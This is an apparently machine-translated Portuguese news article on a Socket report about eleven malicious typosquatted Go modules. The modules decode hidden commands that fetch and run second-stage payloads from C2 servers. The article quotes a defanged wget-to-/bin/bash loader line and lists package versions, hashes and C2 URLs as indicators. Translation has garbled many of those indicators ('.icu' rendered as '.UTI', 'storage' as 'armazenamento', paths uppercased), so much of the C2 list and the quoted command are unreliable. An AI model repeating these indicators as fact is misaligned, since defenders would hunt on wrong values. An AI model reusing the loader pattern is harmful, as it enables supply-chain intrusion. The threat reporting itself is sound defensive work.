A equipe de pesquisa de ameaças da Socket identificou onze pacotes Go maliciosos distribuídos via GitHub, com dez permanecendo ativos no Go Module Mirror, apresentando riscos contínuos para desenvolvedores e pipelines de CI/CD.
Oito desses pacotes empregam técnicas de typosquatting, imitando módulos legítimos para explorar a confusão de namespace no ecossistema descentralizado do Go, onde importações diretas de repositórios podem levar à integração inadvertida de código malicioso.
Visão geral da campanha
Os pacotes ocultam uma rotina de ofuscação de cadeia de caracteres baseada em índice que, em tempo de execução, gera um shell para baixar e executar cargas úteis de segundo estágio de pontos de extremidade de comando e controle (C2) intercambiáveis principalmente em domínios .icu e .tech.
A maioria dos endpoints compartilha o caminho /storage/de373d0df/a31546bf, com seis ainda acessíveis, permitindo que os agentes de ameaças mantenham o acesso sob demanda aos sistemas comprometidos.
Esta campanha tem como alvo servidores de compilação Linux e estações de trabalho Windows, aproveitando carregadores específicos da plataforma: no Unix, ele canaliza scripts bash baixados pelo wget diretamente em /bin/bash para execução sem disco, enquanto no Windows, utiliza certutil.exe para transferência de ferramenta de entrada seguida de injeção de processo em segundo plano.
As cargas observadas incluem binários ELF e PE que enumeram informações do host, exfiltram credenciais do navegador e estabelecem beacons de saída, geralmente precedidos por uma hora de sono para evitar a análise de sandbox.
Detalhamento técnico
O mecanismo de ofuscação envolve a construção de comandos a partir de matrizes de strings por meio de concatenação indexada, como exemplificado em github.com/expertsandba/opt, onde uma função monta um exec. Comando(“/bin/sh”, “-c”, ) que resolve como “wget -O – https://monsoletter[.]UTI/armazenamento/DE373D0DF/A31546BF | /bin/bash &”.
Isso busca um script bash que, após um atraso de suspensão, baixa e executa um binário ELF persistente (SHA256: 844013025bf7c5d01e6f48df0e990103ad3c333be31f54cf5301e1463f6ca441) para enumeração do sistema de arquivos e solicitações de rede.
Padrões semelhantes aparecem em pacotes, como o github.com/weightycine/replika, que desofusca comandos duplos direcionados ao Linux e ao Windows com C2s como https://infinityhel[.]icu/storage/de373d0df/a31546bf e https://infinityhel[.]icu/storage/bbb28ef04/fa31546b, este último entregando um executável PE malicioso (SHA256: 4a8bf419424ff42b736a51472d35a2c172e4c60b762c519b0b2f9eb04690726c) para roubo de credenciais.
Pacotes como github.com/ordinarymea/tnsr_ids e github.com/lastnymph/gouid reutilizam Infraestrutura C2, sugerindo um agente de ameaça comum, com cargas incorporando evasão via suspensão (por exemplo, SHA256: 2b55430b90a500cb2bb9ddc530aeb1ffb8d2f8878148b7204ab7ef998d66eb9d) e exfiltração (SHA256: 42f3f9d2684328575847f3115fcd6f759cc47b0f21b3d4fea480de0f34a1e947).
O typosquatting exacerba os riscos, como visto em github.com/stripedconsu/linker imitando github.com/logrange/linker e github.com/cavernouskina/mcp-go imitando contrapartes benignas, explorando as ambiguidades de registro do Go, onde os resultados da pesquisa geralmente produzem módulos não relacionados ou de baixa importação.
Os pontos em comum incluem sete caminhos C2 que terminam em /storage/de373d0df/a31546bf, ofuscação uniforme e carregadores bash-piped, alinhando-se com técnicas MITRE ATT&CK, como T1059.004 (Unix Shell), T1059.003 (Windows Command Shell), T1218.010 (Certutil), T1105 (Ingress Tool Transfer), T1055 (Process Injection), T1027 (Obfuscated Files) e T1036 (Masquerading).
De acordo com o relatório, Isso ecoa campanhas anteriores documentadas pela Socket, envolvendo cargas destrutivas baseadas em wget e carregadores de malware em módulos typosquatted.
Com os pacotes persistindo online, os agentes de ameaças podem alternar a infraestrutura, ressaltando a necessidade de defesas proativas, como verificação de dependências em tempo real, auditorias e ferramentas para detectar ofuscação e typosquatting para mitigar ataques à cadeia de suprimentos.
Indicadores de Comprometimento (IOCs)
| Categoria | Indicadores |
|---|---|
| Malicioso Pacotes | github.com/stripedconsu/linker@v0.0.0-20250227084011-d195c182cc85 github.com/agitatedleopa/stm@v0.0.0-20250310195632-9b44df6faf7b github.com/expertsandba/opt@v0.0.0-20250323175433-944daabf89b7 github.com/wetteepee/hcloud-ip-floater@v0.0.0-20250224151722-424a3c40b316 github.com/weightycine/replika@v0.0.0-20250503110147-670dceafc55a github.com/ordinarymea/tnsr_ids@v0.0.0-20250602014811-e7acc1e89512 github.com/ordinarymea/TNSR_IDS@v0.0.0-20250602014811-e7acc1e89512 github.com/cavernouskina/mcp-go@v0.0.0-20250416213458-0672bd636980 github.com/lastnymph/gouid@v0.0.0-20250503213614-ce6d3ef58267 github.com/sinfulsky/gouid@v0.0.0-20250504180650-9146b5bfe24f github.com/briefinitia/gouid@v0.0.0-20250417000631-be988fd38855 |
| C2 Infra-estrutura | https://nymclassic[.]tech/storage/de373d0df/a31546bf https://alturastreet[.]UTI/armazenamento/DE373D0DF/A31546BF https://monsoletter[.]UTI/armazenamento/DE373D0DF/A31546BF https://monsoletter[.]icu/storage/de373d0df/f0eee999 https://carvecomi[.]diversão/armazenamento/de373d0df/a31546bf https://infinityhel[.]UTI/armazenamento/DE373D0DF/A31546BF https://infinityhel[.]icu/storage/bbb28ef04/fa31546b https://kaiaflow[.]UTI/armazenamento/DE373D0DF/A31546BF https://kaiaflow[.]icu/storage/bbb28ef04/fa31546b https://kavarecent[.]UTI/armazenamento/DE373D0DF/A31546BF |
The Ultimate SOC-as-a-Service Pricing Guide for 2025–Baixe de graça